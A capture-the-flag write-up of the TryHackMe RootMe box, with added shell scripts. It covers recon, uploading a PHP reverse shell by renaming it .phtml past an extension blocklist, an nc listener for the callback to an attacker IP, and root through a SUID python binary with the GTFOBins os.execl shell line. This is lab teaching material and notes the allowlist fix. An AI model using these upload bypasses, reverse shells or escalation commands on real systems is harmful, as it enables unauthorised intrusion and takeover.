Hello!
Today we’ll be saying our prayers over the second box I conquered on TryHackMe, RootMe; I present you its obituary. I began my mission with reconnaissance using nmap, loaded with two options: -sC for the default scripts and -sV for the versions of the services running on the open ports.
Here we have ports 80 and 22 open, which are HTTP and SSH. HTTP is the protocol web servers and browsers speak across the internet, and SSH, or secure shell, gives us a way to log into a machine remotely. Let’s visit the site, shall we?
Perfect! We have a clear objective for our task, so I felt I should begin with a directory/file brute-forcing tool named Gobuster to see what else I could find while I was here. All it needs is a wordlist to go along with the target address.
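Here is the recon step as a script, added here as an example and not part of the original writeup. It parses nmap's grepable (-oG) output with plain awk so the web port can be handed to gobuster without retyping it. The target 10.10.10.10, the sample scan line and the wordlist path are assumptions constructed for the demo, not output captured from the RootMe box.

```shell
#!/bin/sh
# Added example, not part of the original post: the recon step as a script.
# It parses nmap's grepable (-oG) output with plain awk so the web port can be
# fed to gobuster automatically. 10.10.10.10 and the scan line below are
# constructed sample data, not output captured from the RootMe box.

# The scan the post describes: -sC runs the default scripts, -sV fingerprints
# service versions; -oG adds a grepable copy of the results.
scan_cmd() {
    printf 'nmap -sC -sV -oG scan.gnmap %s\n' "$1"
}

# Constructed sample of one -oG host line (fields are tab-separated).
SAMPLE_GNMAP=$(printf 'Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/\tIgnored State: closed (998)')

# Print "port service" for each open port in -oG lines read from stdin.
# Every entry in the Ports: field is port/state/proto/owner/service/rpc/version/.
open_ports() {
    awk -F'\t' '
        /^Host:/ {
            ports = ""
            for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, entry, ", ")
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[2] == "open") print f[1], f[5]
            }
        }'
}

# Pick the first open port whose service is http: that is where gobuster goes.
web_url() {
    port=$(open_ports | awk '$2 == "http" { print $1; exit }')
    [ -n "$port" ] || return 1
    printf 'http://%s:%s\n' "$1" "$port"
}

# Directory/file brute force against the web root; the wordlist path is the
# one Kali's dirb package installs and is an assumption.
gobuster_cmd() {
    printf 'gobuster dir -u %s -w /usr/share/wordlists/dirb/common.txt\n' "$1"
}

scan_cmd 10.10.10.10
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
url=$(printf '%s\n' "$SAMPLE_GNMAP" | web_url 10.10.10.10)
gobuster_cmd "$url"
```

The functions only build the nmap and gobuster command lines; run those yourself against the box and feed the resulting scan.gnmap into open_ports.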
After sorting through the results I discovered an interesting find at /panel!
and /uploads!
This beautiful recipe brews up the perfect conditions to spawn a reverse shell: an upload form at /panel and a /uploads directory the server will happily serve our file from. A reverse shell is when the victim computer initiates a connection back to the attacker’s computer. Why would we want that? Great question! Usually it’s to get around firewall rules that block inbound connections to the victim: an outbound connection from the victim to the attacker is far more likely to be allowed. Luckily our attack machine is equipped with a PHP reverse shell (the path below is where Kali installs the webshells package); all we have to do is navigate to /usr/share/webshells/php, edit “php-reverse-shell.php”, and set its $ip to our attack machine’s IP and its $port to the port we want to listen on.
Ok, perfect! Now that we’ve edited our script we can upload it through the form at /panel and get closer to spawning a reverse shell. Or so I thought…
To my detriment, it seems .php extensions are prohibited from being uploaded to the server! After some light googling I came across a file upload bypass: all I had to do was change the .php extension to .phtml and voilà! The usual reason this works is that the filter only blocks the literal .php suffix, while the server’s PHP handler is also mapped to .phtml (the stock Apache PHP module config on Debian/Ubuntu covers .php, .phtml and .phar), so the renamed file still executes as PHP when it is served.
Awesome, we have successfully uploaded our shell! From here we set up a listener on port 4444 on our machine, browse to /uploads, and click on our file to get…
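The whole upload step in script form, added here as an example; this is not code from the original post, nor from pentestmonkey's php-reverse-shell. It points the shell at our listener with sed, renames it past a blocklist that rejects only ".php", and shows why the renamed file still executes. The attacker IP 10.9.1.2, the target 10.10.10.10 and the filter functions are assumptions constructed for the demo (the filter models the server's check, it is not the server's real code), and only the two template lines the post says to edit are reproduced.

```shell
#!/bin/sh
# Added example, not code from the original post or from pentestmonkey's
# php-reverse-shell: point the shell at our listener with sed, rename it past
# a blocklist that only rejects ".php", and show why that rename still gets
# executed. 10.9.1.2 is an assumed attacker IP and 10.10.10.10 an assumed
# target; the filter below is a constructed model of the server's check.

ATTACKER_IP=10.9.1.2
ATTACKER_PORT=4444

# Stand-in for /usr/share/webshells/php/php-reverse-shell.php: only the two
# lines the post says to edit are reproduced, as they appear in that file.
make_template() {
    cat <<'EOF'
<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
}

# Rewrite the two placeholder assignments (shell source on stdin).
prep_shell() {
    sed -e "s/^\$ip = '[^']*';/\$ip = '$1';/" \
        -e "s/^\$port = [0-9]*;/\$port = $2;/"
}

# Constructed model of the upload filter: a blocklist that rejects only the
# literal ".php" suffix, which is what the post ran into.
blocklist_rejects() {
    case "$1" in *.php) return 0 ;; esac
    return 1
}

# The fix a defender wants instead: an allowlist of harmless extensions, which
# no alternate PHP suffix can slip through.
allowlist_accepts() {
    case "$1" in *.jpg|*.jpeg|*.png|*.gif) return 0 ;; esac
    return 1
}

# First alternate suffix the blocklist lets through. Debian/Ubuntu's Apache PHP
# module config maps ".+\.ph(ar|p|tml)$" to the PHP handler, so a .phtml or
# .phar upload still runs as PHP when fetched from /uploads.
bypass_name() {
    base=${1%.*}
    for ext in php phtml phar; do
        if ! blocklist_rejects "$base.$ext"; then
            printf '%s\n' "$base.$ext"
            return 0
        fi
    done
    return 1
}

# After the file is uploaded through the /panel form: listen, then request
# the file so the server executes it and it connects back to us.
listen_cmd()  { printf 'nc -lvnp %s\n' "$ATTACKER_PORT"; }
trigger_cmd() { printf 'curl -s http://%s/uploads/%s\n' "$1" "$2"; }

OUT="${TMPDIR:-/tmp}/$(bypass_name shell.php)"
make_template | prep_shell "$ATTACKER_IP" "$ATTACKER_PORT" > "$OUT"
echo "wrote $OUT"
listen_cmd
trigger_cmd 10.10.10.10 "$(basename "$OUT")"
```

Run the printed nc command first, upload the written file through /panel, then run the curl line (or click the file in /uploads as the post does); the shell lands on the listener. Note that allowlist_accepts rejects shell.phtml just as it rejects shell.php, which is why an allowlist, not a blocklist, is the fix on the server side.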
Our beautiful shell as www-data! The first thing I did was upgrade our dumb shell to a proper TTY with Python’s pty module so my arrow keys work correctly, and after some sniffing around I was able to find the user.txt flag!
From here we need a way to escalate our privileges to root, so I decided to check for SUID, or set-user-ID, binaries. The SUID bit makes a program run with the privileges of the file’s owner instead of the user who launched it, so a SUID binary owned by root runs as root. This /bin/python path seems promising.. let’s check GTFOBins, a curated list of Unix binaries and the ways each one can be abused, in our case to escalate privileges through a SUID binary.
This line seems the most promising!
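The SUID hunt and the GTFOBins python entry as shell functions, added here as an example and not part of the original post. The functions are checked against a constructed directory tree rather than the live box, so the paths under $DEMO are assumptions made for the demo; on the box you would point find_suid at / instead.

```shell
#!/bin/sh
# Added example, not part of the original post: the SUID hunt and the GTFOBins
# python entry as shell functions, checked against a constructed directory tree
# rather than the live box. Paths under $DEMO are constructed for the demo.

# Setuid files under a root directory. On the box this is the classic
# "find / -perm -4000 -type f 2>/dev/null"; the root is a parameter so the
# function can be pointed at a test tree. Follow up with "ls -l" on each hit:
# the bit only helps if the owner is root.
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# The GTFOBins SUID entry for python. os.execl replaces the (root-euid) python
# process with a shell; "-p" tells the shell to keep that effective UID rather
# than dropping back to the real UID, www-data.
suid_python_cmd() {
    printf '%s -c '"'"'import os; os.execl("/bin/sh", "sh", "-p")'"'"'\n' "$1"
}

# Scan a tree and, for each setuid python interpreter, emit the escalation
# command to run from the www-data shell.
suggest() {
    find_suid "$1" | while read -r bin; do
        case "$(basename "$bin")" in
            python|python2|python3|python2.*|python3.*) suid_python_cmd "$bin" ;;
        esac
    done
}

# Constructed tree: a dummy "python" carrying the setuid bit, plus an ordinary
# binary that must not be reported.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/usr/bin" "$DEMO/bin"
: > "$DEMO/usr/bin/python"; chmod 4755 "$DEMO/usr/bin/python"
: > "$DEMO/bin/ls";         chmod 0755 "$DEMO/bin/ls"

find_suid "$DEMO"
suggest "$DEMO"
```

The setuid bit only raises the effective UID; the real UID stays www-data, which is exactly why the GTFOBins line passes -p to the new shell. Without it the shell would notice euid != uid and drop the privilege on startup.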
There you go, ladies and gents, we have successfully achieved root on this machine. Thank you for attending this funeral.